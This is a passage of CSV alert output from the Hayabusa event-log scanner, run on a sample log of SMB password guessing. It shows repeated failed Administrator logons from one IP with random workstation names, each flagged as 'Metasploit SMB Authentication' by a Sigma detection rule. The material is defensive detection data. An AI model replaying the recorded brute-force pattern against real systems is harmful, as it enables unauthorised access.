Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 